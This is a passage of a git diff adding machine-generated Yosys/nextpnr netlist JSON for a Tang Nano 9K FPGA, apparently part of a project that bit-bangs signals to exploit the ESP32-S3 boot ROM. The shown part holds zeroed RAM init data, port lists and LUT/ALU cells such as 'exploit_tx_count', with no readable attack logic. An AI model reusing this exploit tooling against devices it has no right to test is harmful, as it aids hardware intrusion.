"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "CLKA": { + "direction": "input", + "bits": [ 2 ] + }, + "CEA": { + "direction": "input", + "bits": [ 3 ] + }, + "CLKB": { + "direction": "input", + "bits": [ 4 ] + }, + "CEB": { + "direction": "input", + "bits": [ 5 ] + }, + "OCE": { + "direction": "input", + "bits": [ 6 ] + }, + "RESETA": { + "direction": "input", + "bits": [ 7 ] + }, + "RESETB": { + "direction": "input", + "bits": [ 8 ] + }, + "ADA": { + "direction": "input", + "bits": [ 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22 ] + }, + "ADB": { + "direction": "input", + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 37, 38, 39 ] + }, + "DI": { + "direction": "input", + "bits": [ 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75 ] + }, + "DO": { + "direction": "output", + "bits": [ 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111 ] + } + }, + "cells": { + }, + "netnames": { + "ADA": { + "hide_name": 0, + "bits": [ 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:507.14-507.17" + } + }, + "ADB": { + "hide_name": 0, + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:507.19-507.22" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 37, 38, 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:508.13-508.19" + } + }, + "CEA": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:504.13-504.16" + } + }, + "CEB": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:504.24-504.27" + } + }, + "CLKA": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:504.7-504.11" + } + }, + "CLKB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:504.18-504.22" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:509.14-509.16" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:510.15-510.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:505.7-505.10" + } + }, + "RESETA": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:506.7-506.13" + } + }, + "RESETB": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:506.15-506.21" + } + } + } + } + } +} diff --git a/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ESP32-S3_Exploit_BitBang_pnr.json b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ESP32-S3_Exploit_BitBang_pnr.json new file mode 100644 index 0000000..addc3f7 --- /dev/null +++ b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ESP32-S3_Exploit_BitBang_pnr.json @@ -0,0 +1,8687 @@ +{ + "creator": "Next Generation Place and Route (Version nextpnr-0.7-63-g2dc71213)", + "modules": { + "top": { + "settings": { + "route": "00000000000000000000000000000001", + "router/tmg_ripup": "0 ", + "router1/useEstimate": "1 ", + "router1/fullCleanupReroute": "1 ", + "router1/cleanupReroute": "1 ", + "router1/maxIterCnt": "200", + "place": "00000000000000000000000000000001", + "placer1/startTemp": "1.000000", + "placer1/minBelsForGridPick": "64", + "placer1/netShareWeight": "0.000000", + "placer1/constraintWeight": "10.000000", + "placerHeap/cellPlacementTimeout": "8", + "placerHeap/netShareWeight": "0.000000", + "placerHeap/parallelRefine": "0 ", + "pack": "00000000000000000000000000000001", + "synth": "00000000000000000000000000000001", + "placerHeap/timingWeight": "10 ", + "placerHeap/criticalityExponent": "2", + "placerHeap/beta": "0.900000", + "placerHeap/alpha": "0.100000", + "seed": "01010011010110001001011110010011", + "arch.type": " ", + "arch.name": "ARCHNAME", + "router": "router1", + "placer": "heap", + "auto_freq": "00000000000000000000000000000000", + "slack_redist_iter": "00000000000000000000000000000000", + "timing_driven": "00000000000000000000000000000001", + "target_freq": "27000000.000000", + "cst.filename": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\tangnano9k.cst", + "packer.partno": "GW1NR-LV9QN88PC6/I5", + "packer.chipdb": "GW1N-9C", + "packer.arch": "himbaechel/gowin" + }, + "attributes": { + "top": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:1.1-73.10", + "dynports": "00000000000000000000000000000001" + }, + "ports": { + "power_tx": { + "direction": "output", + "bits": [ 7410 ] + }, + "led": { + "direction": "output", + "bits": [ 7733, 7731, 7729, 7727, 7725, 7723 ] + }, + "clk_in": { + "direction": "input", + "bits": [ 7408 ] + }, + "bang_tx": { + "direction": "output", + "bits": [ 7407 ] + } + }, + "cells": { + "exploit_tx_count_DFFE_Q_D_ALU_SUM_DUMMY_ALULC": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "C2L" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X7Y11/ALU1" + }, + "port_directions": { + }, + "connections": { + } + }, + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM_CIN_ALU_COUT_HEAD_ALULC": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "C2L" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y11/ALU0" + }, + "port_directions": { + "I2": "input", + "COUT": "output" + }, + "connections": { + "I2": [ 8056 ], + "COUT": [ 8069 ] + } + }, + "instruction_counter_DFFE_Q_D_ALU_SUM_DUMMY_ALULC": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "C2L" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y10/ALU1" + }, + "port_directions": { + }, + "connections": { + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM_CIN_ALU_COUT_HEAD_ALULC": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "C2L" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y10/ALU0" + }, + "port_directions": { + "I2": "input", + "COUT": "output" + }, + "connections": { + "I2": [ 8056 ], + "COUT": [ 8067 ] + } + }, + "ledCounter_DFFRE_Q_D_ALU_SUM_DUMMY_ALULC": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "C2L" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y14/ALU1" + }, + "port_directions": { + }, + "connections": { + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM_CIN_ALU_COUT_HEAD_ALULC": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "C2L" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/ALU0" + }, + "port_directions": { + "I2": "input", + "COUT": "output" + }, + "connections": { + "I2": [ 8056 ], + "COUT": [ 8065 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_TAIL_ALULC": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "C2L" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y13/ALU5" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "CIN": "input", + "COUT": "output" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7739 ], + "CIN": [ 8064 ], + "COUT": [ ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_HEAD_ALULC": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "ONE2C" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y13/ALU0" + }, + "port_directions": { + "I2": "input", + "COUT": "output" + }, + "connections": { + "I2": [ 8056 ], + "COUT": [ 8063 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_TAIL_ALULC": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "C2L" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y12/ALU1" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "CIN": "input", + "COUT": "output" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7740 ], + "CIN": [ 8062 ], + "COUT": [ ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_HEAD_ALULC": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "ONE2C" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y12/ALU0" + }, + "port_directions": { + "I2": "input", + "COUT": "output" + }, + "connections": { + "I2": [ 8056 ], + "COUT": [ 8061 ] + } + }, + "GSR": { + "hide_name": 0, + "type": "GSR", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X0Y0/GSR" + }, + "port_directions": { + "GSRI": "input" + }, + "connections": { + "GSRI": [ 8056 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_S0_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "00000001" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y11/LUT7", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:143.23-144.37", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I2": [ 7618 ], + "I1": [ 7561 ], + "I0": [ 7558 ], + "F": [ 8029 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_S0_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "0001" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y11/LUT6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:139.23-140.26", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I1": [ 7621 ], + "I0": [ 7668 ], + "F": [ 8033 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000000000000001" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/LUT1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7663 ], + "I2": [ 7657 ], + "I1": [ 7651 ], + "I0": [ 7645 ], + "F": [ 8038 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/LUT0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 8037 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/MUX0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 8033 ], + "O": [ 8028 ], + "I1": [ 8038 ], + "I0": [ 8037 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/LUT3", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 8032 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/LUT2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 8031 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/MUX2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 8033 ], + "O": [ 8027 ], + "I1": [ 8032 ], + "I0": [ 8031 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/MUX1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 8029 ], + "O": [ 7889 ], + "I1": [ 8028 ], + "I0": [ 8027 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/LUT1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 8023 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000000000100000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/LUT0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7610 ], + "I2": [ 7605 ], + "I1": [ 7600 ], + "I0": [ 7595 ], + "F": [ 8022 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/MUX0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7626 ], + "O": [ 8015 ], + "I1": [ 8023 ], + "I0": [ 8022 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/LUT3", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 8018 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/LUT2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 8017 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/MUX2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7626 ], + "O": [ 8014 ], + "I1": [ 8018 ], + "I0": [ 8017 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/MUX1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7631 ], + "O": [ 7999 ], + "I1": [ 8015 ], + "I0": [ 8014 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/LUT5", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ ], + "F": [ 8010 ] + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y11/LUT4", + "src": 